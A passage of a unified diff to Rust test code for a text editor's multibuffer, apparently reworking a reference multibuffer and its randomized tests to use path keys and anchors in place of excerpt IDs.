Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } else { let diff = self.diffs.get(&buffer_id).unwrap().read(cx).snapshot(cx); @@ -2624,10 +3159,18 @@ impl 
ReferenceMultibuffer { continue; } - if !excerpt.expanded_diff_hunks.iter().any(|expanded_anchor| { - expanded_anchor.to_offset(buffer).max(buffer_range.start) - == hunk_range.start.max(buffer_range.start) - }) { + if !self + .expanded_diff_hunks_by_buffer + .get(&buffer_id) + .cloned() + .into_iter() + .flatten() + .any(|expanded_anchor| { + expanded_anchor + .cmp(&hunk.buffer_range.start, buffer) + .is_eq() + }) + { log::trace!("skipping a hunk that's not marked as expanded"); continue; } @@ -2645,9 +3188,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: Some((offset..hunk_range.start).to_point(&buffer)), + buffer_range: (offset..hunk_range.start).to_point(&buffer), status: None, - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } @@ -2664,11 +3208,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(base_buffer.remote_id()), range: len..text.len(), - buffer_range: Some( - hunk.diff_base_byte_range.to_point(&base_buffer), - ), + buffer_range: hunk.diff_base_byte_range.to_point(&base_buffer), status: Some(DiffHunkStatus::deleted(hunk.secondary_status)), - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: Some(hunk.buffer_range.start), }); } @@ -2683,9 +3226,10 @@ impl ReferenceMultibuffer { let region = ReferenceRegion { buffer_id: Some(buffer_id), range, - buffer_range: Some((offset..hunk_range.end).to_point(&buffer)), + buffer_range: (offset..hunk_range.end).to_point(&buffer), status: Some(DiffHunkStatus::added(hunk.secondary_status)), - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }; offset = hunk_range.end; regions.push(region); @@ -2699,9 +3243,10 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: Some(buffer_id), range: len..text.len(), - buffer_range: 
Some((offset..buffer_range.end).to_point(&buffer)), + buffer_range: (offset..buffer_range.end).to_point(&buffer), status: None, - excerpt_id: Some(excerpt.id), + excerpt: Some(excerpt.clone()), + deleted_hunk_anchor: None, }); } } @@ -2711,12 +3256,16 @@ impl ReferenceMultibuffer { regions.push(ReferenceRegion { buffer_id: None, range: 0..1, - buffer_range: Some(Point::new(0, 0)..Point::new(0, 1)), + buffer_range: Point::new(0, 0)..Point::new(0, 1), status: None, - excerpt_id: None, + excerpt: None, + deleted_hunk_anchor: None, }); } else { text.pop(); + let region = regions.last_mut().unwrap(); + assert!(region.deleted_hunk_anchor.is_none()); + region.range.end -= 1; } // Retrieve the row info using the region that contains @@ -2727,37 +3276,38 @@ impl ReferenceMultibuffer { .map(|line| { let row_info = regions .iter() - .position(|region| region.range.contains(&ix)) + .rposition(|region| { + region.range.contains(&ix) || (ix == text.len() && ix == region.range.end) + }) .map_or(RowInfo::default(), |region_ix| { - let region = ®ions[region_ix]; - let buffer_row = region.buffer_range.as_ref().map(|buffer_range| { - buffer_range.start.row - + text[region.range.start..ix].matches('\n').count() as u32 - }); - let main_buffer = self - .excerpts - .iter() - .find(|e| e.id == region.excerpt_id.unwrap()) - .map(|e| e.buffer.clone()); + let region = regions[region_ix].clone(); + let buffer_row = region.buffer_range.start.row + + text[region.range.start..ix].matches('\n').count() as u32; + let main_buffer = region.excerpt.as_ref().map(|e| e.buffer.clone()); + let excerpt_range = region.excerpt.as_ref().map(|e| &e.range); let is_excerpt_start = region_ix == 0 - || ®ions[region_ix - 1].excerpt_id != ®ion.excerpt_id + || regions[region_ix - 1].excerpt.as_ref().map(|e| &e.range) + != excerpt_range || regions[region_ix - 1].range.is_empty(); let mut is_excerpt_end = region_ix == regions.len() - 1 - || ®ions[region_ix + 1].excerpt_id != ®ion.excerpt_id; + || regions[region_ix + 
1].excerpt.as_ref().map(|e| &e.range) + != excerpt_range; let is_start = !text[region.range.start..ix].contains('\n'); + let is_last_region = region_ix == regions.len() - 1; let mut is_end = if region.range.end > text.len() { !text[ix..].contains('\n') } else { - text[ix..region.range.end.min(text.len())] + let remaining_newlines = text[ix..region.range.end.min(text.len())] .matches('\n') - .count() - == 1 + .count(); + remaining_newlines == if is_last_region { 0 } else { 1 } }; if region_ix < regions.len() - 1 && !text[ix..].contains("\n") && (region.status == Some(DiffHunkStatus::added_none()) || region.status.is_some_and(|s| s.is_deleted())) - && regions[region_ix + 1].excerpt_id == region.excerpt_id + && regions[region_ix + 1].excerpt.as_ref().map(|e| &e.range) + == excerpt_range && regions[region_ix + 1].range.start == text.len() { is_end = true; @@ -2767,7 +3317,6 @@ impl ReferenceMultibuffer { MultiBufferRow(text[..ix].matches('\n').count() as u32); let mut expand_direction = None; if let Some(buffer) = &main_buffer { - let buffer_row = buffer_row.unwrap(); let needs_expand_up = is_excerpt_start && is_start && buffer_row > 0; let needs_expand_down = is_excerpt_end && is_end @@ -2785,16 +3334,21 @@ impl ReferenceMultibuffer { RowInfo { buffer_id: region.buffer_id, diff_status: region.status, - buffer_row, + buffer_row: Some(buffer_row), wrapped_buffer_row: None, multibuffer_row: Some(multibuffer_row), - expand_info: expand_direction.zip(region.excerpt_id).map( - |(direction, excerpt_id)| ExpandInfo { + expand_info: maybe!({ + let direction = expand_direction?; + let excerpt = region.excerpt.as_ref()?; + Some(ExpandInfo { direction, - excerpt_id, - }, - ), + start_anchor: Anchor::in_buffer( + excerpt.path_key_index, + excerpt.range.start, + ), + }) + }), } }); ix += line.len() + 1; @@ -2802,61 +3356,159 @@ impl ReferenceMultibuffer { }) .collect(); - (text, row_infos, excerpt_boundary_rows) + (text, row_infos, excerpt_boundary_rows, regions) } - fn 
diffs_updated(&mut self, cx: &App) { - for excerpt in &mut self.excerpts { - let buffer = excerpt.buffer.read(cx).snapshot(); - let buffer_id = buffer.remote_id(); + fn diffs_updated(&mut self, cx: &mut App) { + let buffer_ids = self.diffs.keys().copied().collect::>(); + for buffer_id in buffer_ids { + self.update_expanded_diff_hunks_for_buffer(buffer_id, cx); + } + } - // Skip inverted diff excerpts - hunks are always expanded - if self.inverted_diffs.contains_key(&buffer_id) { - continue; - } + fn add_diff(&mut self, diff: Entity, cx: &mut App) { + let buffer_id = diff.read(cx).buffer_id; + self.diffs.insert(buffer_id, diff); + } - let excerpt_range = excerpt.range.to_offset(&buffer); - let Some(diff) = self.diffs.get(&buffer_id) else { - continue; - }; - let diff = diff.read(cx).snapshot(cx); - let mut hunks = diff.hunks_in_row_range(0..u32::MAX, &buffer).peekable(); - excerpt.expanded_diff_hunks.retain(|hunk_anchor| { - if !hunk_anchor.is_valid(&buffer) { + fn add_inverted_diff( + &mut self, + diff: Entity, + main_buffer: Entity, + cx: &App, + ) { + let base_text_buffer_id = diff.read(cx).base_text(cx).remote_id(); + self.inverted_diffs + .insert(base_text_buffer_id, (diff, main_buffer)); + } + + fn update_expanded_diff_hunks_for_buffer(&mut self, buffer_id: BufferId, cx: &mut App) { + let excerpts = self + .excerpts + .iter() + .filter(|excerpt| excerpt.buffer.read(cx).remote_id() == buffer_id) + .collect::>(); + let Some(buffer) = excerpts.first().map(|excerpt| excerpt.buffer.clone()) else { + self.expanded_diff_hunks_by_buffer.remove(&buffer_id); + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let Some(diff) = self.diffs.get(&buffer_id) else { + self.expanded_diff_hunks_by_buffer.remove(&buffer_id); + return; + }; + let diff = diff.read(cx).snapshot(cx); + let hunks = diff + .hunks_in_row_range(0..u32::MAX, &buffer_snapshot) + .collect::>(); + self.expanded_diff_hunks_by_buffer + .entry(buffer_id) + .or_default() + .retain(|hunk_anchor| 
{ + if !hunk_anchor.is_valid(&buffer_snapshot) { return false; } - while let Some(hunk) = hunks.peek() { - match hunk.buffer_range.start.cmp(hunk_anchor, &buffer) { - cmp::Ordering::Less => { - hunks.next(); - } - cmp::Ordering::Equal => { - let hunk_range = hunk.buffer_range.to_offset(&buffer); - return hunk_range.end >= excerpt_range.start - && hunk_range.start <= excerpt_range.end; - } - cmp::Ordering::Greater => break, - } - } - false + + let Ok(ix) = hunks.binary_search_by(|hunk| { + hunk.buffer_range.start.cmp(hunk_anchor, &buffer_snapshot) + }) else { + return false; + }; + let hunk_range = hunks[ix].buffer_range.to_point(&buffer_snapshot); + excerpts.iter().any(|excerpt| { + let excerpt_range = excerpt.range.to_point(&buffer_snapshot); + hunk_range.start >= excerpt_range.start && hunk_range.start <= excerpt_range.end + }) }); - } } - fn add_diff(&mut self, diff: Entity, cx: &mut App) { - let buffer_id = diff.read(cx).buffer_id; - self.diffs.insert(buffer_id, diff); + fn anchor_to_offset(&self, anchor: &Anchor, cx: &App) -> Option { + if anchor.diff_base_anchor().is_some() { + panic!("reference multibuffer cannot yet resolve anchors inside deleted hunks"); + } + let (anchor, snapshot, path_key) = self.anchor_to_buffer_anchor(anchor, cx)?; + // TODO(cole) can maybe make this and expected content call a common function instead + let (text, _, _, regions) = self.expected_content(cx); + + // Locate the first region that contains or is past the putative location of the buffer anchor + let ix = regions.partition_point(|region| { + let excerpt = region + .excerpt + .as_ref() + .expect("should have no buffers in empty reference multibuffer"); + excerpt + .path_key + .cmp(&path_key) + .then_with(|| { + if excerpt.range.end.cmp(&anchor, &snapshot).is_lt() { + Ordering::Less + } else if excerpt.range.start.cmp(&anchor, &snapshot).is_gt() { + Ordering::Greater + } else { + Ordering::Equal + } + }) + .then_with(|| { + if let Some(deleted_hunk_anchor) = 
region.deleted_hunk_anchor { + deleted_hunk_anchor.cmp(&anchor, &snapshot) + } else { + let point = anchor.to_point(&snapshot); + assert_eq!(region.buffer_id, Some(snapshot.remote_id())); + if region.buffer_range.end < point { + Ordering::Less + } else if region.buffer_range.start > point { + Ordering::Greater + } else { + Ordering::Equal + } + } + }) + .is_lt() + }); + + let Some(region) = regions.get(ix) else { + return Some(MultiBufferOffset(text.len())); + }; + + let offset = if region.buffer_id == Some(snapshot.remote_id()) { + let buffer_offset = anchor.to_offset(&snapshot); + let buffer_range = region.buffer_range.to_offset(&snapshot); + assert!(buffer_offset <= buffer_range.end); + let overshoot = buffer_offset.saturating_sub(buffer_range.start); + region.range.start + overshoot + } else { + region.range.start + }; + Some(MultiBufferOffset(offset)) } - fn add_inverted_diff( - &mut self, - diff: Entity, - main_buffer: Entity, + fn anchor_to_buffer_anchor( + &self, + anchor: &Anchor, cx: &App, - ) { - let base_text_buffer_id = diff.read(cx).base_text(cx).remote_id(); - self.inverted_diffs - .insert(base_text_buffer_id, (diff, main_buffer)); + ) -> Option<(text::Anchor, BufferSnapshot, PathKey)> { + let (excerpt, anchor) = match anchor { + Anchor::Min => { + let excerpt = self.excerpts.first()?; + (excerpt, excerpt.range.start) + } + Anchor::Excerpt(excerpt_anchor) => ( + self.excerpts.iter().find(|excerpt| { + excerpt.buffer.read(cx).remote_id() == excerpt_anchor.buffer_id() + })?, + excerpt_anchor.text_anchor, + ), + Anchor::Max => { + let excerpt = self.excerpts.last()?; + (excerpt, excerpt.range.end) + } + }; + + Some(( + anchor, + excerpt.buffer.read(cx).snapshot(), + excerpt.path_key.clone(), + )) } } @@ -2890,7 +3542,7 @@ async fn test_random_set_ranges(cx: &mut TestAppContext, mut rng: StdRng) { .collect::>(); ranges.sort_by_key(|range| range.start); log::info!("Setting ranges: {:?}", row_ranges(&ranges)); - let (created, _) = multibuffer.update(cx, 
|multibuffer, cx| { + multibuffer.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( PathKey::for_buffer(&buf, cx), buf.clone(), @@ -2900,15 +3552,16 @@ async fn test_random_set_ranges(cx: &mut TestAppContext, mut rng: StdRng) { ) }); - assert_eq!(created.len(), ranges.len()); - let snapshot = multibuffer.update(cx, |multibuffer, cx| multibuffer.snapshot(cx)); let mut last_end = None; let mut seen_ranges = Vec::default(); - for (_, buf, range) in snapshot.excerpts() { - let start = range.context.start.to_point(buf); - let end = range.context.end.to_point(buf); + for info in snapshot.excerpts() { + let buffer_snapshot = snapshot + .buffer_for_id(info.context.start.buffer_id) + .unwrap(); + let start = info.context.start.to_point(buffer_snapshot); + let end = info.context.end.to_point(buffer_snapshot); seen_ranges.push(start..end); if let Some(last_end) = last_end.take() { @@ -2960,23 +3613,32 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { }); cx.update(|cx| reference.diffs_updated(cx)); } - 15..=19 if !reference.excerpts.is_empty() => { + 15..=24 if !reference.excerpts.is_empty() => { multibuffer.update(cx, |multibuffer, cx| { - let ids = multibuffer.excerpt_ids(); + let snapshot = multibuffer.snapshot(cx); + let infos = snapshot.excerpts().collect::>(); let mut excerpts = HashSet::default(); - for _ in 0..rng.random_range(0..ids.len()) { - excerpts.extend(ids.choose(&mut rng).copied()); + for _ in 0..rng.random_range(0..infos.len()) { + excerpts.extend(infos.choose(&mut rng).cloned()); } let line_count = rng.random_range(0..5); let excerpt_ixs = excerpts .iter() - .map(|id| reference.excerpts.iter().position(|e| e.id == *id).unwrap()) + .map(|info| { + reference + .excerpts + .iter() + .position(|e| e.range == info.context) + .unwrap() + }) .collect::>(); log::info!("Expanding excerpts {excerpt_ixs:?} by {line_count} lines"); multibuffer.expand_excerpts( - excerpts.iter().cloned(), + excerpts + .iter() + .map(|info| 
snapshot.anchor_in_excerpt(info.context.end).unwrap()), line_count, ExpandExcerptDirection::UpAndDown, cx, @@ -2985,25 +3647,7 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { reference.expand_excerpts(&excerpts, line_count, cx); }); } - 20..=29 if !reference.excerpts.is_empty() => { - let mut ids_to_remove = vec![]; - for _ in 0..rng.random_range(1..=3) { - let Some(excerpt) = reference.excerpts.choose(&mut rng) else { - break; - }; - let id = excerpt.id; - cx.update(|cx| reference.remove_excerpt(id, cx)); - ids_to_remove.push(id); - } - let snapshot = - multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); - ids_to_remove.sort_unstable_by(|a, b| a.cmp(b, &snapshot)); - drop(snapshot); - multibuffer.update(cx, |multibuffer, cx| { - multibuffer.remove_excerpts(ids_to_remove, cx) - }); - } - 30..=39 if !reference.excerpts.is_empty() => { + 25..=34 if !reference.excerpts.is_empty() => { let multibuffer = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); let offset = multibuffer.clip_offset( @@ -3019,32 +3663,7 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { anchors.push(multibuffer.anchor_at(offset, bias)); anchors.sort_by(|a, b| a.cmp(b, &multibuffer)); } - 40..=44 if !anchors.is_empty() => { - let multibuffer = - multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); - let prev_len = anchors.len(); - anchors = multibuffer - .refresh_anchors(&anchors) - .into_iter() - .map(|a| a.1) - .collect(); - - // Ensure the newly-refreshed anchors point to a valid excerpt and don't - // overshoot its boundaries. 
- assert_eq!(anchors.len(), prev_len); - for anchor in &anchors { - if anchor.excerpt_id == ExcerptId::min() - || anchor.excerpt_id == ExcerptId::max() - { - continue; - } - - let excerpt = multibuffer.excerpt(anchor.excerpt_id).unwrap(); - assert_eq!(excerpt.id, anchor.excerpt_id); - assert!(excerpt.contains(anchor)); - } - } - 45..=55 if !reference.excerpts.is_empty() => { + 35..=45 if !reference.excerpts.is_empty() => { multibuffer.update(cx, |multibuffer, cx| { let snapshot = multibuffer.snapshot(cx); let excerpt_ix = rng.random_range(0..reference.excerpts.len()); @@ -3058,20 +3677,19 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { let start = excerpt.range.start; let end = excerpt.range.end; - let range = snapshot.anchor_in_excerpt(excerpt.id, start).unwrap() - ..snapshot.anchor_in_excerpt(excerpt.id, end).unwrap(); + let range = snapshot.anchor_in_excerpt(start).unwrap() + ..snapshot.anchor_in_excerpt(end).unwrap(); log::info!( - "expanding diff hunks in range {:?} (excerpt id {:?}, index {excerpt_ix:?}, buffer id {:?})", - range.to_offset(&snapshot), - excerpt.id, + "expanding diff hunks in range {:?} (excerpt index {excerpt_ix:?}, buffer id {:?})", + range.to_point(&snapshot), buffer_id, ); - reference.expand_diff_hunks(excerpt.id, start..end, cx); + reference.expand_diff_hunks(excerpt.path_key.clone(), start..end, cx); multibuffer.expand_diff_hunks(vec![range], cx); }); } - 56..=85 if needs_diff_calculation => { + 46..=75 if needs_diff_calculation => { multibuffer.update(cx, |multibuffer, cx| { for buffer in multibuffer.all_buffers() { let snapshot = buffer.read(cx).snapshot(); @@ -3102,13 +3720,6 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { // Decide if we're creating a new buffer or reusing an existing one let create_new_buffer = buffers.is_empty() || rng.random_bool(0.4); - let prev_excerpt_ix = rng.random_range(0..=reference.excerpts.len()); - let prev_excerpt_id = reference - .excerpts 
- .get(prev_excerpt_ix) - .map_or(ExcerptId::max(), |e| e.id); - let excerpt_ix = (prev_excerpt_ix + 1).min(reference.excerpts.len()); - let (excerpt_buffer, diff, inverted_main_buffer) = if create_new_buffer { let create_inverted = rng.random_bool(0.3); @@ -3186,43 +3797,45 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { } }; - let (range, anchor_range) = excerpt_buffer.read_with(cx, |buffer, _| { - let end_row = rng.random_range(0..=buffer.max_point().row); - let start_row = rng.random_range(0..=end_row); - let end_ix = buffer.point_to_offset(Point::new(end_row, 0)); - let start_ix = buffer.point_to_offset(Point::new(start_row, 0)); - let anchor_range = buffer.anchor_before(start_ix)..buffer.anchor_after(end_ix); - - log::info!( - "Inserting excerpt at {} of {} for buffer {}: {:?}[{:?}] = {:?}", - excerpt_ix, - reference.excerpts.len(), - buffer.remote_id(), - buffer.text(), - start_ix..end_ix, - &buffer.text()[start_ix..end_ix] - ); - - (start_ix..end_ix, anchor_range) + let excerpt_buffer_snapshot = + excerpt_buffer.read_with(cx, |excerpt_buffer, _| excerpt_buffer.snapshot()); + let mut ranges = reference + .excerpts + .iter() + .filter(|excerpt| excerpt.buffer == excerpt_buffer) + .map(|excerpt| excerpt.range.to_point(&excerpt_buffer_snapshot)) + .collect::>(); + mutate_excerpt_ranges(&mut rng, &mut ranges, &excerpt_buffer_snapshot, 1); + let ranges = ranges + .iter() + .cloned() + .map(ExcerptRange::new) + .collect::>(); + let path = cx.update(|cx| PathKey::for_buffer(&excerpt_buffer, cx)); + let path_key_index = multibuffer.update(cx, |multibuffer, _| { + multibuffer.get_or_create_path_key_index(&path) }); - let excerpt_id = multibuffer.update(cx, |multibuffer, cx| { - multibuffer - .insert_excerpts_after( - prev_excerpt_id, - excerpt_buffer.clone(), - [ExcerptRange::new(range.clone())], - cx, - ) - .pop() - .unwrap() + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpt_ranges_for_path( + path.clone(), + 
excerpt_buffer.clone(), + &excerpt_buffer_snapshot, + ranges.clone(), + cx, + ) }); - reference.insert_excerpt_after( - prev_excerpt_id, - excerpt_id, - (excerpt_buffer.clone(), anchor_range), - ); + cx.update(|cx| { + reference.set_excerpts( + path, + path_key_index, + excerpt_buffer.clone(), + &excerpt_buffer_snapshot, + ranges, + cx, + ) + }); let excerpt_buffer_id = excerpt_buffer.read_with(cx, |buffer, _| buffer.remote_id()); @@ -3256,6 +3869,39 @@ async fn test_random_multibuffer(cx: &mut TestAppContext, mut rng: StdRng) { } } +fn mutate_excerpt_ranges( + rng: &mut StdRng, + existing_ranges: &mut Vec>, + buffer: &BufferSnapshot, + operations: u32, +) { + let mut ranges_to_add = Vec::new(); + + for _ in 0..operations { + match rng.random_range(0..5) { + 0..=1 if !existing_ranges.is_empty() => { + let index = rng.random_range(0..existing_ranges.len()); + log::info!("Removing excerpt at index {index}"); + existing_ranges.remove(index); + } + _ => { + let end_row = rng.random_range(0..=buffer.max_point().row); + let start_row = rng.random_range(0..=end_row); + let end_col = buffer.line_len(end_row); + log::info!( + "Inserting excerpt for buffer {:?}, row range {:?}", + buffer.remote_id(), + start_row..end_row + ); + ranges_to_add.push(Point::new(start_row, 0)..Point::new(end_row, end_col)); + } + } + } + + existing_ranges.extend(ranges_to_add); + existing_ranges.sort_by(|l, r| l.start.cmp(&r.start)); +} + fn check_multibuffer( multibuffer: &MultiBuffer, reference: &ReferenceMultibuffer, @@ -3271,8 +3917,36 @@ fn check_multibuffer( .collect::>(); let actual_row_infos = snapshot.row_infos(MultiBufferRow(0)).collect::>(); - let (expected_text, expected_row_infos, expected_boundary_rows) = + let anchors_to_check = anchors + .iter() + .filter_map(|anchor| { + snapshot + .anchor_to_buffer_anchor(*anchor) + .map(|(anchor, _)| anchor) + }) + // Intentionally mix in some anchors that are (in general) not contained in any excerpt + .chain( + reference + .excerpts + .iter() 
+ .map(|excerpt| excerpt.buffer.read(cx).remote_id()) + .dedup() + .flat_map(|buffer_id| { + [ + text::Anchor::min_for_buffer(buffer_id), + text::Anchor::max_for_buffer(buffer_id), + ] + }), + ) + .map(|anchor| snapshot.anchor_in_buffer(anchor).unwrap()) + .collect::>(); + + let (expected_text, expected_row_infos, expected_boundary_rows, _) = reference.expected_content(cx); + let expected_anchor_offsets = anchors_to_check + .iter() + .map(|anchor| reference.anchor_to_offset(anchor, cx).unwrap()) + .collect::>(); let has_diff = actual_row_infos .iter() @@ -3337,24 +4011,15 @@ fn check_multibuffer( .unwrap() + 1 ); - let reference_ranges = reference - .excerpts - .iter() - .map(|excerpt| { - ( - excerpt.id, - excerpt.range.to_offset(&excerpt.buffer.read(cx).snapshot()), - ) - }) - .collect::>(); for i in 0..snapshot.len().0 { - let excerpt = snapshot + let (_, excerpt_range) = snapshot .excerpt_containing(MultiBufferOffset(i)..MultiBufferOffset(i)) .unwrap(); - assert_eq!( - excerpt.buffer_range().start.0..excerpt.buffer_range().end.0, - reference_ranges[&excerpt.id()] - ); + reference + .excerpts + .iter() + .find(|reference_excerpt| reference_excerpt.range == excerpt_range.context) + .expect("corresponding excerpt should exist in reference multibuffer"); } assert_consistent_line_numbers(&snapshot); @@ -3409,6 +4074,15 @@ fn check_multibuffer( ); } + let actual_anchor_offsets = anchors_to_check + .into_iter() + .map(|anchor| anchor.to_offset(&snapshot)) + .collect::>(); + assert_eq!( + actual_anchor_offsets, expected_anchor_offsets, + "buffer anchor resolves to wrong offset" + ); + for _ in 0..10 { let end_ix = text_rope.clip_offset(rng.random_range(0..=text_rope.len()), Bias::Right); assert_eq!( @@ -3486,8 +4160,8 @@ fn test_history(cx: &mut App) { buf }); let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - multibuffer.update(cx, |this, _| { - this.set_group_interval(group_interval); + multibuffer.update(cx, |this, cx| { + 
this.set_group_interval(group_interval, cx); }); multibuffer.update(cx, |multibuffer, cx| { multibuffer.set_excerpts_for_path( @@ -3533,8 +4207,8 @@ fn test_history(cx: &mut App) { assert_eq!( multibuffer.edited_ranges_for_transaction(transaction_1, cx), &[ - Point::new(0, 0)..Point::new(0, 2), - Point::new(1, 0)..Point::new(1, 2) + MultiBufferOffset(0)..MultiBufferOffset(2), + MultiBufferOffset(7)..MultiBufferOffset(9), ] ); @@ -3750,7 +4424,6 @@ async fn test_summaries_for_anchors(cx: &mut TestAppContext) { }); cx.run_until_parked(); - let mut ids = vec![]; let multibuffer = cx.new(|cx| { let mut multibuffer = MultiBuffer::new(Capability::ReadWrite); multibuffer.set_all_diff_hunks_expanded(cx); @@ -3770,7 +4443,6 @@ async fn test_summaries_for_anchors(cx: &mut TestAppContext) { ); multibuffer.add_diff(diff_1.clone(), cx); multibuffer.add_diff(diff_2.clone(), cx); - ids = multibuffer.excerpt_ids(); multibuffer }); @@ -3794,11 +4466,21 @@ async fn test_summaries_for_anchors(cx: &mut TestAppContext) { ), ); - let anchor_1 = Anchor::in_buffer(ids[0], text::Anchor::MIN); + let anchor_1 = multibuffer.read_with(cx, |multibuffer, cx| { + multibuffer + .snapshot(cx) + .anchor_in_excerpt(text::Anchor::min_for_buffer(buffer_1.read(cx).remote_id())) + .unwrap() + }); let point_1 = snapshot.summaries_for_anchors::([&anchor_1])[0]; assert_eq!(point_1, Point::new(0, 0)); - let anchor_2 = Anchor::in_buffer(ids[1], text::Anchor::MIN); + let anchor_2 = multibuffer.read_with(cx, |multibuffer, cx| { + multibuffer + .snapshot(cx) + .anchor_in_excerpt(text::Anchor::min_for_buffer(buffer_2.read(cx).remote_id())) + .unwrap() + }); let point_2 = snapshot.summaries_for_anchors::([&anchor_2])[0]; assert_eq!(point_2, Point::new(3, 0)); } @@ -3824,7 +4506,7 @@ async fn test_trailing_deletion_without_newline(cx: &mut TestAppContext) { cx, ); multibuffer.add_diff(diff_1.clone(), cx); - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + 
multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); multibuffer }); @@ -3857,7 +4539,7 @@ async fn test_trailing_deletion_without_newline(cx: &mut TestAppContext) { let (_, translated_offset) = snapshot.point_to_buffer_offset(Point::new(2, 0)).unwrap(); assert_eq!(translated_offset.0, "one\n".len()); - let (_, translated_point, _) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); + let (_, translated_point) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); assert_eq!(translated_point, Point::new(1, 0)); // The same, for an excerpt that's not at the end of the multibuffer. @@ -3900,7 +4582,7 @@ async fn test_trailing_deletion_without_newline(cx: &mut TestAppContext) { let (buffer, translated_offset) = snapshot.point_to_buffer_offset(Point::new(2, 0)).unwrap(); assert_eq!(buffer.remote_id(), buffer_1_id); assert_eq!(translated_offset.0, "one\n".len()); - let (buffer, translated_point, _) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); + let (buffer, translated_point) = snapshot.point_to_buffer_point(Point::new(2, 0)).unwrap(); assert_eq!(buffer.remote_id(), buffer_1_id); assert_eq!(translated_point, Point::new(1, 0)); } @@ -3940,6 +4622,7 @@ fn format_diff( }; let expand = info .expand_info + .as_ref() .map(|expand_info| match expand_info.direction { ExpandExcerptDirection::Up => " [↑]", ExpandExcerptDirection::Down => " [↓]", @@ -4283,9 +4966,15 @@ fn assert_excerpts_match( ) { let mut output = String::new(); multibuffer.read_with(cx, |multibuffer, cx| { - for (_, buffer, range) in multibuffer.snapshot(cx).excerpts() { + let snapshot = multibuffer.snapshot(cx); + for excerpt in multibuffer.snapshot(cx).excerpts() { output.push_str("-----\n"); - output.extend(buffer.text_for_range(range.context)); + output.extend( + snapshot + .buffer_for_id(excerpt.context.start.buffer_id) + .unwrap() + .text_for_range(excerpt.context), + ); if !output.ends_with('\n') { output.push('\n'); } @@ -4498,14 +5187,14 @@ fn 
assert_position_translation(snapshot: &MultiBufferSnapshot) { if let Some((buffer, offset)) = snapshot.point_to_buffer_offset(snapshot.max_point()) { assert!(offset.0 <= buffer.len()); } - if let Some((buffer, point, _)) = snapshot.point_to_buffer_point(snapshot.max_point()) { + if let Some((buffer, point)) = snapshot.point_to_buffer_point(snapshot.max_point()) { assert!(point <= buffer.max_point()); } } fn assert_line_indents(snapshot: &MultiBufferSnapshot) { let max_row = snapshot.max_point().row; - let buffer_id = snapshot.excerpts().next().unwrap().1.remote_id(); + let buffer_id = snapshot.excerpts().next().unwrap().context.start.buffer_id; let text = text::Buffer::new(ReplicaId::LOCAL, buffer_id, snapshot.text()); let mut line_indents = text .line_indents_in_row_range(0..max_row + 1) @@ -4693,7 +5382,8 @@ fn test_random_chunk_bitmaps_with_diffs(cx: &mut App, mut rng: StdRng) { let mut diffs = Vec::new(); multibuffer.update(cx, |multibuffer, cx| { - for buffer_id in multibuffer.excerpt_buffer_ids() { + let snapshot = multibuffer.snapshot(cx); + for buffer_id in snapshot.all_buffer_ids() { if rng.random_bool(0.7) { if let Some(buffer_handle) = multibuffer.buffer(buffer_id) { let buffer_text = buffer_handle.read(cx).text(); @@ -4854,7 +5544,7 @@ fn collect_word_diffs( }); multibuffer.update(cx, |multibuffer, cx| { - multibuffer.expand_diff_hunks(vec![Anchor::min()..Anchor::max()], cx); + multibuffer.expand_diff_hunks(vec![Anchor::Min..Anchor::Max], cx); }); let snapshot = multibuffer.read_with(cx, |multibuffer, cx| multibuffer.snapshot(cx)); @@ -4969,38 +5659,40 @@ fn test_excerpts_containment_functions(cx: &mut App) { let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); - let (excerpt_1_id, excerpt_2_id, excerpt_3_id) = multibuffer.update(cx, |multibuffer, cx| { - multibuffer.set_excerpts_for_path( - PathKey::sorted(0), - buffer_1.clone(), - [Point::new(0, 0)..Point::new(1, 3)], - 0, - cx, - ); + let (excerpt_1_info, excerpt_2_info, 
